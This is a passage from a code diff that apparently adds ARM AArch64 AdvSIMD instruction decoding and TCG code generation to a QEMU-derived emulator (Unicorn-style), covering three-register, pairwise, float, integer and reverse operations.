+} + +static void handle_pmull_64(DisasContext *s, int is_q, int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* PMULL of 64 x 64 -> 128 is an odd special case because it + * is the only three-reg-diff instruction which produces a + * 128-bit wide result from a single operation. However since + * it's possible to calculate the two halves more or less + * separately we just use two helper calls. + */ + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op1, rn, is_q, MO_64); + read_vec_element(s, tcg_op2, rm, is_q, MO_64); + gen_helper_neon_pmull_64_lo(tcg_ctx, tcg_res, tcg_op1, tcg_op2); + write_vec_element(s, tcg_res, rd, 0, MO_64); + gen_helper_neon_pmull_64_hi(tcg_ctx, tcg_res, tcg_op1, tcg_op2); + write_vec_element(s, tcg_res, rd, 1, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_res); +} + +/* C3.6.15 AdvSIMD three different + * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+---+------+--------+-----+------+------+ + * | 0 | Q | U | 0 1 1 1 0 | size | 1 | Rm | opcode | 0 0 | Rn | Rd | + * +---+---+---+-----------+------+---+------+--------+-----+------+------+ + */ +static void disas_simd_three_reg_diff(DisasContext *s, uint32_t insn) +{ + /* Instructions in this group fall into three basic classes + * (in each case with the operation working on each element in + * the input vectors): + * (1) widening 64 x 64 -> 128 (with possibly Vd as an extra + * 128 bit input) + * (2) wide 64 x 128 -> 128 + * (3) narrowing 128 x 128 -> 64 + * Here we do initial decode, catch unallocated cases and + * dispatch to separate functions for each class. + */ + int is_q = extract32(insn, 30, 1); + int is_u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 4); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + + switch (opcode) { + case 1: /* SADDW, SADDW2, UADDW, UADDW2 */ + case 3: /* SSUBW, SSUBW2, USUBW, USUBW2 */ + /* 64 x 128 -> 128 */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_3rd_wide(s, is_q, is_u, size, opcode, rd, rn, rm); + break; + case 4: /* ADDHN, ADDHN2, RADDHN, RADDHN2 */ + case 6: /* SUBHN, SUBHN2, RSUBHN, RSUBHN2 */ + /* 128 x 128 -> 64 */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_3rd_narrowing(s, is_q, is_u, size, opcode, rd, rn, rm); + break; + case 14: /* PMULL, PMULL2 */ + if (is_u || size == 1 || size == 2) { + unallocated_encoding(s); + return; + } + if (size == 3) { + if (!arm_dc_feature(s, ARM_FEATURE_V8_PMULL)) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_pmull_64(s, is_q, rd, rn, rm); + return; + } + goto is_widening; + case 9: /* SQDMLAL, SQDMLAL2 */ + case 11: /* SQDMLSL, SQDMLSL2 */ + case 13: /* SQDMULL, SQDMULL2 */ + if (is_u || size == 0) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ + case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ + case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ + case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ + case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + case 12: /* SMULL, SMULL2, UMULL, UMULL2 */ + /* 64 x 64 -> 128 */ + if (size == 3) { + unallocated_encoding(s); + return; + } + is_widening: + if (!fp_access_check(s)) { + return; + } + + handle_3rd_widening(s, is_q, is_u, size, opcode, rd, rn, rm); + break; + default: + /* opcode 15 not allocated */ + unallocated_encoding(s); + break; + } +} + +/* Logic op (opcode == 3) subgroup of C3.6.16. */ +static void disas_simd_3same_logic(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int rm = extract32(insn, 16, 5); + int size = extract32(insn, 22, 2); + bool is_u = extract32(insn, 29, 1); + bool is_q = extract32(insn, 30, 1); + TCGv_i64 tcg_op1, tcg_op2, tcg_res[2]; + int pass; + + if (!fp_access_check(s)) { + return; + } + + tcg_op1 = tcg_temp_new_i64(tcg_ctx); + tcg_op2 = tcg_temp_new_i64(tcg_ctx); + tcg_res[0] = tcg_temp_new_i64(tcg_ctx); + tcg_res[1] = tcg_temp_new_i64(tcg_ctx); + + for (pass = 0; pass < (is_q ? 2 : 1); pass++) { + read_vec_element(s, tcg_op1, rn, pass, MO_64); + read_vec_element(s, tcg_op2, rm, pass, MO_64); + + if (!is_u) { + switch (size) { + case 0: /* AND */ + tcg_gen_and_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 1: /* BIC */ + tcg_gen_andc_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 2: /* ORR */ + tcg_gen_or_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 3: /* ORN */ + tcg_gen_orc_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + } + } else { + if (size != 0) { + /* B* ops need res loaded to operate on */ + read_vec_element(s, tcg_res[pass], rd, pass, MO_64); + } + + switch (size) { + case 0: /* EOR */ + tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 1: /* BSL bitwise select */ + tcg_gen_xor_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_op2); + tcg_gen_and_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_res[pass]); + tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_op2, tcg_op1); + break; + case 2: /* BIT, bitwise insert if true */ + tcg_gen_xor_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_res[pass]); + tcg_gen_and_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_op2); + tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); + break; + case 3: /* BIF, bitwise insert if false */ + tcg_gen_xor_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_res[pass]); + tcg_gen_andc_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_op2); + tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); + break; + } + } + } + + write_vec_element(s, tcg_res[0], rd, 0, MO_64); + if (!is_q) { + tcg_gen_movi_i64(tcg_ctx, tcg_res[1], 0); + } + write_vec_element(s, tcg_res[1], rd, 1, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_res[0]); + tcg_temp_free_i64(tcg_ctx, tcg_res[1]); +} + +/* Helper functions for 32 bit comparisons */ +static void gen_max_s32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i32 op1, TCGv_i32 op2) +{ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, res, op1, op2, op1, op2); +} + +static void gen_max_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i32 op1, TCGv_i32 op2) +{ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GEU, res, op1, op2, op1, op2); +} + +static void gen_min_s32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i32 op1, TCGv_i32 op2) +{ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LE, res, op1, op2, op1, op2); +} + +static void gen_min_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i32 op1, TCGv_i32 op2) +{ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LEU, res, op1, op2, op1, op2); +} + +/* Pairwise op subgroup of C3.6.16. + * + * This is called directly or via the handle_3same_float for float pairwise + * operations where the opcode and size are calculated differently. + */ +static void handle_simd_3same_pair(DisasContext *s, int is_q, int u, int opcode, + int size, int rn, int rm, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr fpst; + int pass; + + /* Floating point operations need fpst */ + if (opcode >= 0x58) { + fpst = get_fpstatus_ptr(tcg_ctx); + } else { + TCGV_UNUSED_PTR(fpst); + } + + if (!fp_access_check(s)) { + return; + } + + /* These operations work on the concatenated rm:rn, with each pair of + * adjacent elements being operated on to produce an element in the result. + */ + if (size == 3) { + TCGv_i64 tcg_res[2]; + + for (pass = 0; pass < 2; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + int passreg = (pass == 0) ? rn : rm; + + read_vec_element(s, tcg_op1, passreg, 0, MO_64); + read_vec_element(s, tcg_op2, passreg, 1, MO_64); + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + switch (opcode) { + case 0x17: /* ADDP */ + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 0x58: /* FMAXNMP */ + gen_helper_vfp_maxnumd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x5a: /* FADDP */ + gen_helper_vfp_addd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x5e: /* FMAXP */ + gen_helper_vfp_maxd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x78: /* FMINNMP */ + gen_helper_vfp_minnumd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x7e: /* FMINP */ + gen_helper_vfp_mind(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + default: + g_assert_not_reached(); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } + } else { + int maxpass = is_q ? 4 : 2; + TCGv_i32 tcg_res[4]; + + for (pass = 0; pass < maxpass; pass++) { + TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + NeonGenTwoOpFn *genfn = NULL; + int passreg = pass < (maxpass / 2) ? rn : rm; + int passelt = (is_q && (pass & 1)) ? 2 : 0; + + read_vec_element_i32(s, tcg_op1, passreg, passelt, MO_32); + read_vec_element_i32(s, tcg_op2, passreg, passelt + 1, MO_32); + tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); + + switch (opcode) { + case 0x17: /* ADDP */ + { + static NeonGenTwoOpFn * const fns[3] = { + gen_helper_neon_padd_u8, + gen_helper_neon_padd_u16, + tcg_gen_add_i32, + }; + genfn = fns[size]; + break; + } + case 0x14: /* SMAXP, UMAXP */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_pmax_s8, gen_helper_neon_pmax_u8 }, + { gen_helper_neon_pmax_s16, gen_helper_neon_pmax_u16 }, + { gen_max_s32, gen_max_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x15: /* SMINP, UMINP */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_pmin_s8, gen_helper_neon_pmin_u8 }, + { gen_helper_neon_pmin_s16, gen_helper_neon_pmin_u16 }, + { gen_min_s32, gen_min_u32 }, + }; + genfn = fns[size][u]; + break; + } + /* The FP operations are all on single floats (32 bit) */ + case 0x58: /* FMAXNMP */ + gen_helper_vfp_maxnums(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x5a: /* FADDP */ + gen_helper_vfp_adds(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x5e: /* FMAXP */ + gen_helper_vfp_maxs(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x78: /* FMINNMP */ + gen_helper_vfp_minnums(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x7e: /* FMINP */ + gen_helper_vfp_mins(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + default: + g_assert_not_reached(); + } + + /* FP ops called directly, otherwise call now */ + if (genfn) { + genfn(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + } + + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + } + + for (pass = 0; pass < maxpass; pass++) { + write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_32); + tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); + } + if (!is_q) { + clear_vec_high(s, rd); + } + } + + if (!TCGV_IS_UNUSED_PTR(fpst)) { + tcg_temp_free_ptr(tcg_ctx, fpst); + } +} + +/* Floating point op subgroup of C3.6.16. */ +static void disas_simd_3same_float(DisasContext *s, uint32_t insn) +{ + /* For floating point ops, the U, size[1] and opcode bits + * together indicate the operation. size[0] indicates single + * or double. + */ + int fpopcode = extract32(insn, 11, 5) + | (extract32(insn, 23, 1) << 5) + | (extract32(insn, 29, 1) << 6); + int is_q = extract32(insn, 30, 1); + int size = extract32(insn, 22, 1); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + + int datasize = is_q ? 128 : 64; + int esize = 32 << size; + int elements = datasize / esize; + + if (size == 1 && !is_q) { + unallocated_encoding(s); + return; + } + + switch (fpopcode) { + case 0x58: /* FMAXNMP */ + case 0x5a: /* FADDP */ + case 0x5e: /* FMAXP */ + case 0x78: /* FMINNMP */ + case 0x7e: /* FMINP */ + if (size && !is_q) { + unallocated_encoding(s); + return; + } + handle_simd_3same_pair(s, is_q, 0, fpopcode, size ? MO_64 : MO_32, + rn, rm, rd); + return; + case 0x1b: /* FMULX */ + case 0x1f: /* FRECPS */ + case 0x3f: /* FRSQRTS */ + case 0x5d: /* FACGE */ + case 0x7d: /* FACGT */ + case 0x19: /* FMLA */ + case 0x39: /* FMLS */ + case 0x18: /* FMAXNM */ + case 0x1a: /* FADD */ + case 0x1c: /* FCMEQ */ + case 0x1e: /* FMAX */ + case 0x38: /* FMINNM */ + case 0x3a: /* FSUB */ + case 0x3e: /* FMIN */ + case 0x5b: /* FMUL */ + case 0x5c: /* FCMGE */ + case 0x5f: /* FDIV */ + case 0x7a: /* FABD */ + case 0x7c: /* FCMGT */ + if (!fp_access_check(s)) { + return; + } + + handle_3same_float(s, size, elements, fpopcode, rd, rn, rm); + return; + default: + unallocated_encoding(s); + return; + } +} + +/* Integer op subgroup of C3.6.16. */ +static void disas_simd_3same_int(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int is_q = extract32(insn, 30, 1); + int u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 11, 5); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + int pass; + + switch (opcode) { + case 0x13: /* MUL, PMUL */ + if (u && size != 0) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x0: /* SHADD, UHADD */ + case 0x2: /* SRHADD, URHADD */ + case 0x4: /* SHSUB, UHSUB */ + case 0xc: /* SMAX, UMAX */ + case 0xd: /* SMIN, UMIN */ + case 0xe: /* SABD, UABD */ + case 0xf: /* SABA, UABA */ + case 0x12: /* MLA, MLS */ + if (size == 3) { + unallocated_encoding(s); + return; + } + break; + case 0x16: /* SQDMULH, SQRDMULH */ + if (size == 0 || size == 3) { + unallocated_encoding(s); + return; + } + break; + default: + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + } + + if (!fp_access_check(s)) { + return; + } + + if (size == 3) { + assert(is_q); + for (pass = 0; pass < 2; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op1, rn, pass, MO_64); + read_vec_element(s, tcg_op2, rm, pass, MO_64); + + handle_3same_64(s, opcode, u, tcg_res, tcg_op1, tcg_op2); + + write_vec_element(s, tcg_res, rd, pass, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + } + } else { + for (pass = 0; pass < (is_q ? 4 : 2); pass++) { + TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + NeonGenTwoOpFn *genfn = NULL; + NeonGenTwoOpEnvFn *genenvfn = NULL; + + read_vec_element_i32(s, tcg_op1, rn, pass, MO_32); + read_vec_element_i32(s, tcg_op2, rm, pass, MO_32); + + switch (opcode) { + case 0x0: /* SHADD, UHADD */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_hadd_s8, gen_helper_neon_hadd_u8 }, + { gen_helper_neon_hadd_s16, gen_helper_neon_hadd_u16 }, + { gen_helper_neon_hadd_s32, gen_helper_neon_hadd_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x1: /* SQADD, UQADD */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qadd_s8, gen_helper_neon_qadd_u8 }, + { gen_helper_neon_qadd_s16, gen_helper_neon_qadd_u16 }, + { gen_helper_neon_qadd_s32, gen_helper_neon_qadd_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x2: /* SRHADD, URHADD */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_rhadd_s8, gen_helper_neon_rhadd_u8 }, + { gen_helper_neon_rhadd_s16, gen_helper_neon_rhadd_u16 }, + { gen_helper_neon_rhadd_s32, gen_helper_neon_rhadd_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x4: /* SHSUB, UHSUB */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_hsub_s8, gen_helper_neon_hsub_u8 }, + { gen_helper_neon_hsub_s16, gen_helper_neon_hsub_u16 }, + { gen_helper_neon_hsub_s32, gen_helper_neon_hsub_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x5: /* SQSUB, UQSUB */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qsub_s8, gen_helper_neon_qsub_u8 }, + { gen_helper_neon_qsub_s16, gen_helper_neon_qsub_u16 }, + { gen_helper_neon_qsub_s32, gen_helper_neon_qsub_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x6: /* CMGT, CMHI */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_cgt_s8, gen_helper_neon_cgt_u8 }, + { gen_helper_neon_cgt_s16, gen_helper_neon_cgt_u16 }, + { gen_helper_neon_cgt_s32, gen_helper_neon_cgt_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x7: /* CMGE, CMHS */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_cge_s8, gen_helper_neon_cge_u8 }, + { gen_helper_neon_cge_s16, gen_helper_neon_cge_u16 }, + { gen_helper_neon_cge_s32, gen_helper_neon_cge_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x8: /* SSHL, USHL */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_shl_s8, gen_helper_neon_shl_u8 }, + { gen_helper_neon_shl_s16, gen_helper_neon_shl_u16 }, + { gen_helper_neon_shl_s32, gen_helper_neon_shl_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x9: /* SQSHL, UQSHL */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_u8 }, + { gen_helper_neon_qshl_s16, gen_helper_neon_qshl_u16 }, + { gen_helper_neon_qshl_s32, gen_helper_neon_qshl_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0xa: /* SRSHL, URSHL */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_rshl_s8, gen_helper_neon_rshl_u8 }, + { gen_helper_neon_rshl_s16, gen_helper_neon_rshl_u16 }, + { gen_helper_neon_rshl_s32, gen_helper_neon_rshl_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0xb: /* SQRSHL, UQRSHL */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qrshl_s8, gen_helper_neon_qrshl_u8 }, + { gen_helper_neon_qrshl_s16, gen_helper_neon_qrshl_u16 }, + { gen_helper_neon_qrshl_s32, gen_helper_neon_qrshl_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0xc: /* SMAX, UMAX */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_max_s8, gen_helper_neon_max_u8 }, + { gen_helper_neon_max_s16, gen_helper_neon_max_u16 }, + { gen_max_s32, gen_max_u32 }, + }; + genfn = fns[size][u]; + break; + } + + case 0xd: /* SMIN, UMIN */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_min_s8, gen_helper_neon_min_u8 }, + { gen_helper_neon_min_s16, gen_helper_neon_min_u16 }, + { gen_min_s32, gen_min_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0xe: /* SABD, UABD */ + case 0xf: /* SABA, UABA */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_abd_s8, gen_helper_neon_abd_u8 }, + { gen_helper_neon_abd_s16, gen_helper_neon_abd_u16 }, + { gen_helper_neon_abd_s32, gen_helper_neon_abd_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x10: /* ADD, SUB */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_add_u8, gen_helper_neon_sub_u8 }, + { gen_helper_neon_add_u16, gen_helper_neon_sub_u16 }, + { tcg_gen_add_i32, tcg_gen_sub_i32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x11: /* CMTST, CMEQ */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_tst_u8, gen_helper_neon_ceq_u8 }, + { gen_helper_neon_tst_u16, gen_helper_neon_ceq_u16 }, + { gen_helper_neon_tst_u32, gen_helper_neon_ceq_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x13: /* MUL, PMUL */ + if (u) { + /* PMUL */ + assert(size == 0); + genfn = gen_helper_neon_mul_p8; + break; + } + /* fall through : MUL */ + case 0x12: /* MLA, MLS */ + { + static NeonGenTwoOpFn * const fns[3] = { + gen_helper_neon_mul_u8, + gen_helper_neon_mul_u16, + tcg_gen_mul_i32, + }; + genfn = fns[size]; + break; + } + case 0x16: /* SQDMULH, SQRDMULH */ + { + static NeonGenTwoOpEnvFn * const fns[2][2] = { + { gen_helper_neon_qdmulh_s16, gen_helper_neon_qrdmulh_s16 }, + { gen_helper_neon_qdmulh_s32, gen_helper_neon_qrdmulh_s32 }, + }; + assert(size == 1 || size == 2); + genenvfn = fns[size - 1][u]; + break; + } + default: + g_assert_not_reached(); + } + + if (genenvfn) { + genenvfn(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op1, tcg_op2); + } else { + genfn(tcg_ctx, tcg_res, tcg_op1, tcg_op2); + } + + if (opcode == 0xf || opcode == 0x12) { + /* SABA, UABA, MLA, MLS: accumulating ops */ + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_add_u8, gen_helper_neon_sub_u8 }, + { gen_helper_neon_add_u16, gen_helper_neon_sub_u16 }, + { tcg_gen_add_i32, tcg_gen_sub_i32 }, + }; + bool is_sub = (opcode == 0x12 && u); /* MLS */ + + genfn = fns[size][is_sub]; + read_vec_element_i32(s, tcg_op1, rd, pass, MO_32); + genfn(tcg_ctx, tcg_res, tcg_op1, tcg_res); + } + + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + } + } + + if (!is_q) { + clear_vec_high(s, rd); + } +} + +/* C3.6.16 AdvSIMD three same + * 31 30 29 28 24 23 22 21 20 16 15 11 10 9 5 4 0 + * +---+---+---+-----------+------+---+------+--------+---+------+------+ + * | 0 | Q | U | 0 1 1 1 0 | size | 1 | Rm | opcode | 1 | Rn | Rd | + * +---+---+---+-----------+------+---+------+--------+---+------+------+ + */ +static void disas_simd_three_reg_same(DisasContext *s, uint32_t insn) +{ + int opcode = extract32(insn, 11, 5); + + switch (opcode) { + case 0x3: /* logic ops */ + disas_simd_3same_logic(s, insn); + break; + case 0x17: /* ADDP */ + case 0x14: /* SMAXP, UMAXP */ + case 0x15: /* SMINP, UMINP */ + { + /* Pairwise operations */ + int is_q = extract32(insn, 30, 1); + int u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + if (opcode == 0x17) { + if (u || (size == 3 && !is_q)) { + unallocated_encoding(s); + return; + } + } else { + if (size == 3) { + unallocated_encoding(s); + return; + } + } + handle_simd_3same_pair(s, is_q, u, opcode, size, rn, rm, rd); + break; + } + case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: + case 0x20: case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x26: case 0x27: + case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x2e: case 0x2f: + case 0x30: case 0x31: + /* floating point ops, sz[1] and U are part of opcode */ + disas_simd_3same_float(s, insn); + break; + default: + disas_simd_3same_int(s, insn); + break; + } +} + +static void handle_2misc_widening(DisasContext *s, int opcode, bool is_q, + int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Handle 2-reg-misc ops which are widening (so each size element + * in the source becomes a 2*size element in the destination. + * The only instruction like this is FCVTL. + */ + int pass; + + if (size == 3) { + /* 32 -> 64 bit fp conversion */ + TCGv_i64 tcg_res[2]; + int srcelt = is_q ? 2 : 0; + + for (pass = 0; pass < 2; pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + read_vec_element_i32(s, tcg_op, rn, srcelt + pass, MO_32); + gen_helper_vfp_fcvtds(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_op); + } + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } + } else { + /* 16 -> 32 bit fp conversion */ + int srcelt = is_q ? 4 : 0; + TCGv_i32 tcg_res[4]; + + for (pass = 0; pass < 4; pass++) { + tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_res[pass], rn, srcelt + pass, MO_16); + gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_res[pass], tcg_res[pass], + tcg_ctx->cpu_env); + } + for (pass = 0; pass < 4; pass++) { + write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_32); + tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); + } + } +} + +static void handle_rev(DisasContext *s, int opcode, bool u, + bool is_q, int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op = (opcode << 1) | u; + int opsz = op + size; + int grp_size = 3 - opsz; + int dsize = is_q ? 128 : 64; + int i; + + if (opsz >= 3) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (size == 0) { + /* Special case bytes, use bswap op on each group of elements */ + int groups = dsize / (8 << grp_size); + + for (i = 0; i < groups; i++) { + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_tmp, rn, i, grp_size); + switch (grp_size) { + case MO_16: + tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); + break; + case MO_32: + tcg_gen_bswap32_i64(tcg_ctx, tcg_tmp, tcg_tmp); + break; + case MO_64: + tcg_gen_bswap64_i64(tcg_ctx, tcg_tmp, tcg_tmp); + break; + default: + g_assert_not_reached(); + } + write_vec_element(s, tcg_tmp, rd, i, grp_size); + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + } + if (!is_q) { + clear_vec_high(s, rd); + } + } else { + int revmask = (1 << grp_size) - 1; + int esize = 8 << size; + int elements = dsize / esize; + TCGv_i64 tcg_rn = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rd = tcg_const_i64(tcg_ctx, 0); + TCGv_i64 tcg_rd_hi = tcg_const_i64(tcg_ctx, 0); + + for (i = 0; i < elements; i++) { + int e_rev = (i & 0xf) ^ revmask; + int off = e_rev * esize; + read_vec_element(s, tcg_rn, rn, i, size); + if (off >= 64) { + tcg_gen_deposit_i64(tcg_ctx, tcg_rd_hi, tcg_rd_hi, + tcg_rn, off - 64, esize); + } else { + 